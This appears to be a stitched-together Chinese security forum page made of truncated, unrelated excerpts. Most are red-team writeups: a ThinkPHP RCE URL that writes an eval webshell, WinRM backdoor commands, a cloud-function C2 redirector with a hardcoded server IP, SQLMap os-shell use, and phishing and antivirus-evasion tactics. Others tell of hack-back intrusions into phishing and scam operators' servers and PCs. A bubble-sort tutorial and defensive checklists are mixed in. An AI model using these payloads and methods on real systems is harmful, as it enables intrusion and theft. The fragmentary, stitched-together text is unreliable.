红队攻击面相关讨论

WEB ezphp 题目描述：一支专注于卫星通信技术的研究团队正在努力改进他们的通信系统，以提高数据传输的效率和安全性，团队决定采用PHP 8.3.2来完善通信系统开发。 考点：php filter chain Oracle PHP Filter链——基于oracle的文件读取攻击 参考：https://xz.aliyun.com/t/12939?time__1311=mqmhqIx%2BxfOD7DloaGkWepSazHG%3D4D#toc-16 题目给出源码如下 <?php highlight_file(__FILE__); // flag.php if (isset($_POST['f'])) { echo hash_file('md5', $_POST['f']); } ?> 这里可以用的项目：https://github.com/synacktiv/php_filter_chains_oracle_exploit/ 考点：可用PHP Filter链-基于oracle的文件读取攻击生成exp执行，题目提示php版本号正好满足条件，下载exp进行利用 执行payload，这里可能需要多跑几次才可以 python3 filters_chain_oracle_exploit.py --target http://eci-2zea1zzp9231ugqw9htd.cloudeci1.ichunqiu.com/ --file flag.php --parameter f …

WinRM实现端口复用这种攻击方式前提是需要帐号和密码，如果在获得hash的情况下也可以利用evil-winrm来实现hash登录 服务介绍WinRM全称是Windows Remote Management，是微软服务器硬件管理功能的一部分，能够对本地或远程的服务器进行管理。WinRM服务能够让管理员远程登录Windows操作系统，获得一个类似Telnet的交互式命令行shell，而底层通讯协议使用的是HTTP。 后门应用在windows2012服务器中，winrm默认启动，开启了5985端口，在2008系统中需要手动开启服务 winrm quickconfig -q启动后防火墙也会放行该端口 设置启用httplistener监听并存 winrm set winrm/config/service @{EnableCompatibilityHttpListener="true"} //80 winrm set winrm/config/service @{EnableCompatibilityHttpsListener="true"} //443 修改监听端口为80/443 winrm set winrm/config/Listener?Address=*+Transport=HTTP @{Port="80"} winrm set winrm/config/Listener?Address=*+Transport=HTTPS　 @{Port="443"} 本地连接也需要开启WinRM服务，然后设置信任连接的主机， winrm quickc…

一个学长前几天不幸在钓鱼网站中招被骗走一些资金，在联系有关部门前找到了我看看能不能获取到一些有用的信息以便于有关部门行动 在对网站进行初步信息收集后发现网站使用ThinkPHP 5.0.7框架，直接找到ThinkPHP对应版本的Exp进行尝试： http://www.hu*****.***/index.php?s=/index/\think\app/invokefunction&function=phpinfo&vars[0]=1 //执行phpinfo 成功弹出phpinfo，ThinkPHP的RCE漏洞没有修复，并且通过phpinfo可以看出服务器使用宝塔搭建，运行Windows系统，本想着接下来的事情就非常简单了，但是当我写Shell时遇到了困难： http://www.hu*****.***/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=ye.php&vars[1][]=<?php eval($_POST['cmd']);?> 文件被成功写入，但是却直接输出在了页面中，查看源代码发现< >被转义为了HTML实体编码： 在尝试利用base64编码后再写入，发现依然被转义，直接命令执行试一试： http://www.hu*****.***/index.php?s=/ind…

0x00 漏洞描述Apache Shiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理。之前Apache Shiro身份验证绕过漏洞CVE-2020-11989的修复补丁存在缺陷，在1.5.3及其之前的版本，由于shiro在处理url时与spring仍然存在差异，依然存在身份校验绕过漏洞由于处理身份验证请求时出错，远程攻击者可以发送特制的HTTP请求，绕过身份验证过程并获得对应用程序的未授权访问。0x01 漏洞影响Apache Shiro < 1.6.00x02 环境搭建1.下载项目到本地https://github.com/l3yx/springboot-shiro2.将pom.xml中的1.5.2替换为1.5.3，将src/main/java/org/syclover/srpingbootshiroLoginController中的后台验证/admin/page替换为/admin/{name}3.通过IDEA编辑器重新build并运行即可，已编译好的war包将其放到tomcat下的webapps目录下运行即可https://github.com/backlion/demo/blob/master/srpingboot-shiro-0.0.1-SNAPSHOT.war0x03 代码说明1.ShiroConfig.java(pringboot-shiro-master\src\main\java\org\syclover\srpingbootshiro\ShiroConfig.java)权限配置， 当请求/…

0x01 前言 提示：当个反面案例看就好，实际上拿下的方式远没有下文说的那么麻烦，只怪自己太心急… 本来是之前BC项目搞下来的一个推广站，当时只拿到了Shell 权限是一个普通用户，想提权进一步收集服务器上的信息时，发现运行各种东西都是权限拒绝，提示组策略阻止了这个程序，当时因为还有的别的事情，就没继续研究了（项目已获得有关部门授权，用户名比较敏感，后面全程打码）。 0x02 Bypass Applocker 最近突然想起来了，就继续搞一下，问了下群里的师傅 知道是什么东西以后就好说了，耐心找一找总会有收获的，附上Applocker介绍： https://baike.baidu.com/item/Applocker/2300852?fr=aladdin然后就找到3g师傅的一篇文章： https://3gstudent.github.io/3gstudent.github.io/Use-msxsl-to-bypass-AppLocker/具体怎么利用就自行看文章吧，看完文章后续的大概思路差不多就清晰了 0x03 上线到提权 我想的是bypass applocker让目标服务器执行我的马子上线后在进行后续的提权，然而Shell下执行 net user、tasklist /SVC等等都没得回显，不然可以通过进程对比判断下杀软（自己写的小轮子，目前可匹配进程已经增加到960+了：http://get-av.se7ensec.cn/） 既然不知道，那我就拼一拼人品，赌一下主机里没有杀软，通过上面3g师傅文章…

冒泡排序作为初学者最常用的排序算法之一，大家应该闭着眼都能敲出来，但是如果在数据较大的情况下，冒泡排序的效率并不高，因为它的时间复杂度是O(n^2)，但是在我们又不会其它排序算法的前提下，怎么尽量给它优化一下呢，这就是今天要讲的内容。 首先先看普通代码 // 冒泡排序 void bubbleSort(int arr[], int n) { for (int i = 0; i < n - 1; i++) { for (int j = 0; j < n - 1 - i; j++) { if (arr[j] > arr[j + 1]) { int t = arr[j]; arr[j] = arr[j + 1]; arr[j + 1] = t; } } } } 它要一个个比较大小，然后从后面排到第一个，但是如果有几个数组是这样子的： arr[10]={1,2,3,4,5,6,7,8,10,9}; brr[10]={1,2,3,4,5,6,8,7,10,9}; 那是不是除了后面的那几个，其他的都排序好了呀，但是普通的冒泡排序还会继续比较前面的然后排序，这是不是使程序的效率更不高了，那有没有什么可以优化的地方呢，让我们排完后面的就结束排序呢？当然有的，请看代码： // 冒泡排序 void bubbleSort(int arr[], int n) { for (int i = 0; i < n - 1; i++) { …

前言 好,开冲了 Web41 过滤了0-9 a-z ~ + $[]{}-\等 使用的是post请求 这里直接用脚本 脚本的路径也附上 https://blog.csdn.net/miuzzx/article/details/108569080 把php脚本和python脚本放到一起 <?php $myfile = fopen("rce_or.txt", "w"); $contents=""; for ($i=0; $i < 256; $i++) { for ($j=0; $j <256 ; $j++) { if($i<16){ $hex_i='0'.dechex($i); } else{ $hex_i=dechex($i); } if($j<16){ $hex_j='0'.dechex($j); } else{ $hex_j=dechex($j); } $preg = '/[0-9]|[a-z]|\^|\+|\~|\$|\[|\]|\{|\}|\&|\-/i'; if(preg_match($preg , hex2bin($hex_i))||preg_match($preg , hex2bin($hex_j))){ echo ""; } else{ $a='%'.$hex_i; $b='%'.$hex_j; $…

0x00 漏洞描述 Atlassian Jira是澳大利亚Atlassian公司的一套缺陷跟踪管理系统。该系统主要用于对工作中各类问题、缺陷进行跟踪管理。 Atlassian Jira Server和Jira Data Center存在服务端模板注入漏洞，成功利用此漏洞的攻击者可对运行受影响版本的Jira Server或Jira Data Center的服务器执行任意命令，从而获取服务器权限，严重危害网络资产。 0x01 CVE编号 CVE-2019-11581 0x02 漏洞危害等级 高危 0x03 漏洞影响范围 AtlassianJira 4.4.x AtlassianJira 5.x.x AtlassianJira 6.x.x AtlassianJira 7.0.x AtlassianJira 7.1.x AtlassianJira 7.2.x AtlassianJira 7.3.x AtlassianJira 7.4.x AtlassianJira 7.5.x AtlassianJira 7.6.x < 7.6.14 AtlassianJira 7.7.x AtlassianJira 7.8.x AtlassianJira 7.9.x AtlassianJira 7.10.x AtlassianJira 7.11.x AtlassianJira 7.12.x AtlassianJira 7.13.x < 7.13.5 AtlassianJira 8.0.x < 8.0.3 AtlassianJira…

0x01 前言 去年年底，当设置一个模拟器来定位SMB协议时，发现了一个如此简单而又非常有效的攻击大型企业的漏洞。TL; DR：一个拒绝服务错误允许BSOD协议向Windows 8.1和Windows Server 2012 R2计算机发送单个数据包。 0x02 测试环境 受影响的系统： ·Windows 8.1（x86） ·Windows Server 2012 R2（x64） 0x03 背景知识 要了解此漏洞的根本原因，需要了解SMB数据包的结构方式。 让我们来看一下SMBv1协议头文件： 正如我们所看到的协议字段以FF字节开始,现在让我们来看看SMBv2 协议字段现在以FE字节开始,那么SMBv3呢？SMB协议的v3版本已经过加密，并将使用SMB2_Transform的特定头部进行加密通信： SMBv3 始终是加密的，正如可以在官方文档中了解到SMBv3会话的协商从SMBv2会话开始。以下是设置SMBv3会话时涉及到的数据包： 在1到8字节的数据包中，SMB数据头看起来像这样： 我们可以看到，使用的字节序列仍然是0xFE，它是Microsoft官方文档中指示的SMBv2的代码。 从第9字节开始，加密处于连通状态，并且报头中使用的字节序列将为0xFD 正如您在PoC中看到的那样，当第一次会话时立即发送带有0xFD报头的SMB数据包时会发生内核崩溃。现在，让我们深入了解崩溃转储机制，以了解此次崩溃的根本原因。 0x04 根本原因分析 仅在Windows 8.1（x86）上执行来…

首先，我们需要登录腾讯云，开启云函数。 登录腾讯云后，搜索云函数。开通即可。 初次登录，需要授权。 登录控制台后，点击新建。 函数名称随意，选择从头开始，环境填Python3.6，选完后下拉，把代码搞里头。 复制下面代码，并修改服务器地址。 # coding: utf8 import json,requests,base64 def main_handler(event, context): response = {} path = None headers = None try: C2='http://43.134.164.72:80' if 'path' in event.keys(): path=event['path'] if 'headers' in event.keys(): headers=event['headers'] if 'httpMethod' in event.keys() and event['httpMethod'] == 'GET' : resp=requests.get(C2+path,headers=headers,verify=False) else: resp=requests.post(C2+path,data=event['body'],headers=headers,ve…

概述通过替换认证信息后重放请求，并对比数据包结果，判断接口是否存在越权漏洞 特点 支持HTTPS自动过滤图片/js/css/html页面等静态内容多线程检测，避免阻塞支持输出报表与完整的URL、请求、响应安装和使用 安装依赖 git clone https://github.com/y1nglamore/IDOR_detect_tool.git启动 即可监听socks5://127.0.0.1:8889。 安装证书 使用SwitchOmega等插件连接该代理，并访问mitm.it即可进入证书安装页面，根据操作系统进行证书安装。 以MacOS为例： 下载安装后，打开钥匙串访问，找到mitmproxy证书，修改为alwaystrust 检测漏洞 首先准备好目标系统的A、B两账号，根据系统的鉴权逻辑（Cookie、header、参数等）将A账号信息配置config/config.yml，之后登录B账号 使用B账号访问，脚本会自动替换鉴权信息并重放，根据响应结果判断是否存在越权漏洞 生成报表 每次有新漏洞都会自动添加到report/result.html中，通过浏览器打开： 点击具体条目可以展开/折叠对应的请求和响应： 检测逻辑 原文连接：https://github.com/y1nglamore/IDOR_detect_tool

MISC 签到题 八道网络安全选择题，百度都能搜索到答案，这里如果只知道部分题目答案，可以通过枚举测试fuzz答案，获得flag flag: flag{a236b34b-8040-4ea5-9e1c-97169aa3f43a} RE re693 直接下载附件用golang打开 看main函数可以发现会打印两句话，要求输入有六个参数并且第三个为gLIhR 的函数、被调用三次并且会调用到cHZv5op8rOmlAkb6的函数 Input the first function, which has 6 parameters and the third named gLIhR: 输入第一个函数，它有 6 个参数，第三个名为 gLIhR： Input the second function, which has 3 callers and invokes the function named cHZv5op8rOmlAkb6: 输入第二个函数，它有 3 个调用者并调用名为 cHZv5op8rOmlAkb6 的函数： 直接全局搜索，第一个函数为，ZlXDJkH3OZN4Mayd，有6个参数 第二个函数可以先全局搜索cHZv5op8rOmlAkb6 看哪个函数会调用到这个函数，然后再进一步搜索看看符不符合题意，相对应函数为UhnCm82SDGE0zLYO 有6个，出去自己，还有之后那个2个重复判断，则有3个调用 然后就是看主函数 func main() { var nFAzj, CuSkl string …

0x01 说明本次用到的平台是：https://chaos.projectdiscovery.io/,该平台收集国外各大漏洞赏金平台，目前拥有资产规模大概在1600 0000~1800 0000，很可怕的数量 ，并且每小时都在增加或减少，对接非常多的第三方自建赏金平台，这比我们自己去收集某个平台会来的多，挖到的概率也更大。 0x02 自动化方案流程使用脚本去获取projectdiscovery平台的所有资产，资产侦察与收集就交给projectdiscovery了把下载的资产对比上次Master domain数据，判断当前是否有新增资产出现，如果没有就结束 ，就等待下一次循环如果有，就把新增的资产提取出来，创建临时文件，并把新资产加入到Masterdomain把新增资产使用naabu 进行端口扫描，把开放的端口使用httpx来验证，提取http存活资产把http存活资产送往nuclei进行漏洞扫描，同时也送往Xray，默认使用Xray的基础爬虫功能扫描常见漏洞Xray的扫描结果保存成xray-new-$(date +%F-%T).html，也可以同时添加webhook模式推送nuclei漏洞扫描结果用notify实时推送、 nuclei与xray都扫描结束后 ，等待下一次循环，这一切都是自动去执行 0x03 准备工作先安装这些工具，并设置好软链接，能全局使用，这些工具安装很简单，不再阐述，github也有 安装教程 Centos7+ 64 位 配置 4H 4G起 【服务器一台】chaospy【资产侦查、资产下载】 https://g…

0X01 找到注入点故事的起因还是因为我太闲了，上班摸鱼。 摸着摸着就摸到了某个网站的查询框。 接着老毛病就犯了，上去就输入了个1查询 接着输入了1’ 啧啧啧，这明显有SQL注入哇。 果断掏出SQLMAP神器。 结局很完美，不仅存在注入，还是DBA的权限。 0X02 网站get shell利用SQL注入去get shell有几种常见的方法，一种是跑数据，跑目录找到网站的管理后台，进入到后台想办法通过文件上传的等方法去拿shell；要么就通过报错，phpinfo界面，404界面等一些方式知道网站绝对路径，然后去写入shell，不过相对于mysql来说条件还是有些苛刻的。 接着就是掏出御剑开始扫网站目录，目录还挺多。 随意点开了个admin 我去，竟然存在目录遍历。 接着又点开了00/ 一口老血喷出，这，还没开始就结束了？？？ 绝对路径不请自来，竟然还是最常见的路径，早知道直接--os-shell跑常见路径了-- 含泪拿着绝对路径，直接SQLMAP中--os-shell 这里有个点要了解一下，sqlmap中mysql数据库--os-shell的时候，sqlmap先写入一个文件上传shell tmpxxxx.php，再通过文件上传shell上传命令执行shell tmpxxxx.php，再利用命令执行shell执行命令。 具体可以去雨九九大佬博客学习一波。 https://www.cnblogs.com/Rain99-/p/13755496.html 所以这里我就直接用sqlmap文件上传的shell去上传我的shell了 …

0x00 漏洞介绍 Apache Shiro 存在高危代码执行漏洞。该漏洞是由于Apache Shiro cookie中通过 AES-128-CBC 模式加密的rememberMe字段存在问题，用户可通过Padding Oracle 加密生成的攻击代码来构造恶意的rememberMe字段，并重新请求网站，进行反序列化攻击，最终导致任意代码执行。0x01 影响版本Apache Shiro 1.2.5, 1.2.6, 1.3.0, 1.3.1, 1.3.2, 1.4.0-RC2, 1.4.0, 1.4.1版本。0x02 漏洞指纹1.set-Cookie: rememberMe=deleteMe 2.URL中有shiro字样 3.有一些时候服务器不会主动返回 rememberMe=deleteMe, 直接发包即可0x03 利用技巧1.该漏洞需要登录后获取到合法的Cookie: rememberMe=XXX后才可以进行利用, 看起来不是很好利用 但实际上有一些网站是开放注册的, 而且这个洞不需要知道服务端密钥 所以后续的利用还是可以同Shiro-550一样利用, 而且这里是AES加密的, 自带过WAF属性 ；2.如果攻击没有生效, 可以试一下删除Cookie中的JSESSIONID 字段, 很多时候这个字段存在的话, 服务端不会去处理 rememberMe。0x04 漏洞原理由于Apache Shiro cookie中通过 AES-128-CBC 模式加密的rememberMe字段存在问题，用户可通过Padding Oracle 加密…

0x00 前言 在我们之前的文章中，我们讨论了如何使用SUID二进制文件和/etc/passwd 文件的Linux权限提升技巧，今天我们发布了另一种“使用Sudoers文件进行Linux权限提示技巧”的方法。 在解决CTF挑战时，对于权限提升，我们始终通过执行sudo -l命令来检查任何用户执行任何文件或命令的root权限。 您可以阅读我们之前的文章，其中我们已应用此技巧进行权限提升。 0x01 sudoer基础 1.基本概念 在Linux/Unix中，/etc目录下的sudoers文件是sudo权限的配置文件。我们都知道sudo命令的强大功能，sudo这个词代表了超级用户权限。Sudoers文件是存储具有root权限的用户和组的文件，以root或其他用户身份运行部分或全部命令。请看下图： 当与sudo一起运行任何命令时，它需要root权限才能执行，Linux会检查sudoers文件中的特定用户名。并给出结论，特定的用户名是否在sudoers文件列表中，如果没有，那么就不能使用sudo命令运行命令或程序。根据sudo权限，root用户可以从ALL终端执行，充当所有用户：all group，并运行ALL命令。 2.Sudoer文件语法 如果（root用户）希望授予任何特定用户sudo权限，请输入visudo命令，该命令将打开sudoers文件进行编辑。在用户权限规范下，您将看到默认的root权限“root ALL =（ALL：ALL）ALL”，但在实际情况下，还提供了标记选项，这是可选的，如下图所示。 考虑下面的示例，我们要…

这是一则漫长又跌宕起伏的故事，小伙伴们请随意就坐，自备茶点；全文包含信息收集与攻克的详细全过程，以及对该类型诈骗思路的分析拆解，以提高防范意识； 0x00 梦的开始那是一个阳光明媚的晌午，日常的搬砖过程中收到一封公司邮件， 看到这熟悉的措辞，又瞄了一眼下面的附件内容，熟悉的气息扑面而来，就顺手保存了下来； 随即管理员立马发现了不对劲，追发邮件说员工账号被盗用，不要轻信邮件内容，原始邮件也被标为垃圾邮件（上次的类似邮件删的太突然，事情还没开始就结束了，这次总跑不掉了(￣_,￣ )，作为当代好青年，五星好市民，是时候发扬一下活雷锋精神了）； 而这张图片，就成了一切梦开始的地方…… 0x01 信息收集0x001 审查域名起始信息非常有限，开局一张图，剧情全靠猜，不过这个入口也足够了，先拿出家伙解析下二维码中的信息： 没有额外的数据，只有一串网页链接，看着这域名名称，嘴角微微上扬；先去解析一下域名： 到写文为止已经不能解析该域名了，整顿的倒挺快，不过好在之前有解析备份，域名万变不离其 IP，并且也没有发现使用 CDN，流量全部通往源站；顺手查了一下，是香港的服务器： 然后 whois 一下，搜集相关信息： 不出意外，又是用的三方注册机构，没有额外的有用信息，不过这个注册时间挺有意思，本月的，骗子同志动作还蛮快的；接下来只能去对方网站瞅瞅； 又是西部数码，看来有些备受青睐，网站提供隐私保护机制，注册信息不对外公开，暂时也获取不到有用信息； 0x002 审查 IP现在唯一的线索就是之前解析的那个 IP 了，一步一步来，先 …

作为公司内部网络安全建设的基础环节，资产的收集以及对应的管理，尤其是漏洞管理，都是网络安全建设的基础。 资产收集第一步--已入网设备的收集： （1）收集手段：根据历史登记记录查询或者使用扫描方式对网络环境内部进行活跃主机探测。 （2）收集目标：覆盖所有已入网设备，包括云、IoT设备等，建立相应的库表结构存储，定期复测，有序更新。 资产收集第二步--新入网设备的收集： （1）收集手段：入网登记或者使用智能入网探测机制，可以利用网络探测技术，或者入网联通身份验证机制做收集。 （2）收集目标：覆盖所有新入网设备，包括云、IoT设备等，建立相应的库表结构存储，定期复测，有序更新。 资产收集第三步--虚拟资产的收集： （1）虚拟资产：包括但不限于重要数据记录、IP地址、MAC地址、主域名、子域名、CNAME记录、MX记录、NS记录、A记录等等。 （2）收集手段：登记审核机制以及扫描解析请求。 （3）收集目标：覆盖所有虚拟资产，建立相应的库表结构存储，定期复测，有序更新。 资产分析第一步--主机OS、SOFTWARE、SERVICES等信息收集： （1）技术手段：扫描 （2）收集信息：os系统信息（包含口令信息）、网络协议栈信息（MAC、IP、PORT、PROTOCOL、SERVICES）、软件信息（软件名称、版本） （3）收集目标：覆盖所有以上信息，并定期追踪探测，有序更新。 资产分析第二步--漏洞库建立： （1）收集方法：有条件的建立自己的SRC和漏洞平台，众测收集漏洞；自身，或邀请有资质的机构进行渗透测试，…

01 前言 近日无事闲逛，偶遇某群有人在招程序员帮忙写Exp和收shell啊收0day啊，又觉近日无文章可写，所以便尝试社会一波大佬。 首先呢先问问套路一下，看看他干啥的. 这个人想找人帮忙写批量的Exp 然后假装自己能写，先套路一波，进入角色，让对方以为我真的可以写。 这里呢，我说我自己搭建了一个站点，用于测试，然后叫他链接shell试试看看。是否OK！ 接着该目标并未上线，他将我搭建的站点发送给了他们手下的其他两个人。 02 技术一号 被我社工的这个某产人员，实际不懂技术，他将我的钓鱼页面发给了他们手下2个技术人员，其中一个上线的估计是个虚拟机，另外一个上线的则是物理机。所以这里只钓鱼到了一台。 这里一共上线了2台PC电脑，他们拥有统一的外网IP出口，柬埔寨显示地点，目前不知道真假。这个人就是我们所谓的脚本小子黑客。给各位看看他的PC都有那些资料。 脚本木马 各类实名证件 各种批量黑客工具 黑帽SEO关键词 入侵用的各类VPS机器 各类网站的账户 03 内网拓展渗透 每一个进程都有一个环境块，其中包含一组环境变量及其值。有两种类型的环境变量，用户环境变量和系统环境变量。 arp -a 看了一下。发现了如下机器。10多台。 192.168.1.1 78-44-fd-fd-55-b9 动态 192.168.1.13 6c-8d-c1-18-aa-b2 动态 192.…

Nmap Full Web Vulnerable Scan cd /usr/share/nmap/scripts/ wget http://www.computec.ch/projekte/vulscan/download/nmap_nse_vulscan-2.0.tar.gz && tar xzf nmap_nse_vulscan-2.0.tar.gz nmap -sS -sV --script=vulscan/vulscan.nse target nmap -sS -sV --script=vulscan/vulscan.nse –script-args vulscandb=scipvuldb.csv target nmap -sS -sV --script=vulscan/vulscan.nse –script-args vulscandb=scipvuldb.csv -p80 target nmap -PN -sS -sV --script=vulscan –script-args vulscancorrelation=1 -p80 target nmap -sV --script=vuln target nmap -PN -sS -sV --script=all –script-args vulscancorrelation=1 target Dirb Dir Bruteforce: dirb http://IP:PORT /usr/share/dirb/wordlists/common.txt …

一、STEP1->合理的网络规划与边界防护： 　　这里其实是一个老生常谈的问题，虽然Google号称消灭网络边界很多年了，至少2015年我就听说过类似的概念，但是目前国内甲方尤其是重资产甲方是无法消灭网络边界的，在短时内也看不到消灭网络边界的可能性。因而合理规划网络环境，做好边界安全防护依然是最最基础的事情。 　　（1）合理规划网络拓扑并不局限于Inside、Outside、DMZ等传统划分，而是根据实实在在的网络联通需求，合理规划自己的布局。 　　（2）合理划分区域，在区域合理规划FW、WAF、IPS、IDS、SOC、UTM、STIM、Agent（流量分析探针，用于APT攻击检测）等设备的部署，和互动互联。 　　（3）ACL配置：互相访问权限应该满足业务需求情况下，按照最小权限原则进行。所有的ACL配置以及相关变动需要保存历史记录，以便于审计。 　　（4）异地分公司通过VPN访问企业内部网络。且需要保证可靠的流量加密算法和足够强度的身份认证管理机制，例如双因子认证，动态认证等措施。 　　（5）云托管化的网络部署，应该在云上做虚拟的网路划分，对网络访问做满足需求下的最小权限分配。 　　（6）部署蜜罐、密网、沙箱的环境，诱导攻击者，发现攻击者、发现供给趋势，用于提供威胁情报、安全决策依据，并在一定程度上保护和隐藏机构内部信息网络。 二、STEP2->资产可信可控管理与漏洞管理： 　　对于很多依靠技术起家的互联网甲方目前的资产管理都是一团糟。何况大多数非IT行业的公司。所以对于资产的可信可控高效的组织管理是…

简述 钓鱼是攻防对抗中一种常用的手段，攻击者通常伪装成可信任的实体，例如合法的机构、公司或个人，以引诱受害者揭示敏感信息或执行恶意操作，能快速地撕破目标的伤口，快速进内网进行刷分，投递木马同时需要考虑逃避杀毒软件检测，本篇文章将围绕一些常见的钓鱼手法和木马免杀对抗展开 信息搜集 批量邮箱搜集 https://app.snov.io/ http://www.skymem.info/ 搜索引擎 一般来说，企业邮箱都存在邮件网关，邮件投递容易被退信拦截，所以我们要选择私人邮箱或不被邮服拦截的邮箱： 如 xx举报，xx招聘面对大众的邮箱，相关语法： site:"xxx.com" 举报 site:"xxx.com" 招聘 xx公司举报 @126.com xx公司招聘 @qq.com 钓鱼手法 社工钓鱼 首先是目标选择，目标群体：hr、经理、财务 等安全意识薄弱的人优先选择，提前准备多套场景应对 选择目标公司分部进行钓鱼成功率较高，提前想好话术和应变对策，避免被识破，最好不要在总部，避开IT信息安全部 社牛的师傅可以尝试电话钓鱼，获取信任再添加微信发送木马（需要过人的心理素质和应变能力，之前从潘高工身上学到很多） 邮件钓鱼 群发邮件（不推荐，易被管理员发现或被邮件网关拦截） 搜集关键人物个人邮箱定向投递（推荐，隐蔽性强） 福利补贴发放 紧贴时事话题，使用各种福利活动吸引目标用户点击，把钓鱼链接转为二维码发送 简历投递 招聘投递简历，hr面对大量简历不会仔细查看后缀 钓鱼文案…

信息收集 正准备开干，有人企鹅私聊我让我跟他赚大钱。 群发也就算了，都开始私聊了，现在不法分子猖狂到什么地步了，这能惯着它。。。京东卡先放放，打开前台是个博彩论坛。 随手一个login，后台出来了，网站是php的，常用口令试了几次，admin存在，密码错误。 放在云悉上看一下。 访问一下子域名，很僵硬。 再看看端口吧，3306开放，主机是Windows的。 收集完毕，框架没扫出来，几乎没啥进展，唯一的突破点就是后台和端口了。 登录后台 3306抱着尝试心态爆破试试，不出意外，mysql没出来。 top100后台爆破试了一下没出来，希望不大，翻找js，可能会有口令，敏感路径，特殊接口什么，但是真的干干净净，可能我看的不仔细。 没有其他突破点，只能再爆破后台试一下了，拿了个大字典，真的跑了超久，最后总算出来了，铁头娃在世。用的字典是人名缩写、年份、特殊字符给搞出来了。 坎坷上传 后台论坛文章管理处看见编辑器，瞬间两眼放光。 允许单图片、多图片尝试上传。 裂开了，白名单限制。 各种截断绕过失败。 看看是什么编辑器，翻找js文件，得知为wangeditor编辑器。 网上搜了一下，这个编辑器好像没什么漏洞，思路已干~ 转折出现 继续翻翻找找，发现订单详情也可下载订单图片。 下载链接： http://www.xxx.com/…

一、文件/文件夹管理 ls #列出当前目录文件（不包括隐含文件） ls -a #列出当前目录文件（包括隐含文件） ls -l #列出当前目录下文件的详细信息 ls -al #列出当前详细目录文件和隐藏的文件信息 cd .. #回当前目录的上一级目录 cd ~ #回当前用户的宿主目录 cd 目录名 #改变当前目录 pwd #查看当前目录路径 mkdir test #创建一个空目录 rmdir test #删除一个空目录 rm -rf dir #删除所有含有目录和文件 rm filename #删除一个文件或多个文件 mv /lib/usr /opt/ #将文件移动相对路经下的文件到…

（1）注入的分类 基于从服务器接收到的响应 ▲基于错误的SQL注入 ▲联合查询的类型 ▲堆查询注射 ▲SQL盲注 •基于布尔SQL盲注 •基于时间的SQL盲注 •基于报错的SQL盲注 基于如何处理输入的SQL查询（数据类型） •基于字符串 •数字或整数为基础的 基于程度和顺序的注入(哪里发生了影响) ★一阶注射 ★二阶注射 一阶注射是指输入的注射语句对WEB直接产生了影响，出现了结果；二阶注入类似存储型XSS，是指输入提交的语句，无法直接对WEB应用程序产生影响，通过其它的辅助间接的对WEB产生危害，这样的就被称为是二阶注入. 基于注入点的位置上的 ▲通过用户输入的表单域的注射。 ▲通过cookie注射。 ▲通过服务器变量注射。 （基于头部信息的注射） url编码：一般的url编码其实就是那个字符的ASCII值得十六进制，再在前面加个% 具体可以看http://www.w3school.com.cn/tags/html_ref_urlencode.html，这里可以查到每个字符的url编码，当然自己编程或者用该语言应该也有自带的函数，去实现url编码 常用的写出来吧： 空格是%20，单引号是%27， 井号是%23，双引号是%22 判断sql注入（显错和基于错误的盲注）：单引号，and 1=1 和and 1=2，双引号，反斜杠，注释等 判断基于时间的盲注:在上面的基础上，加个sleep函数 ，如sleep(5) (函数不同数据库有所不同)例子： ' and sleep(5) "…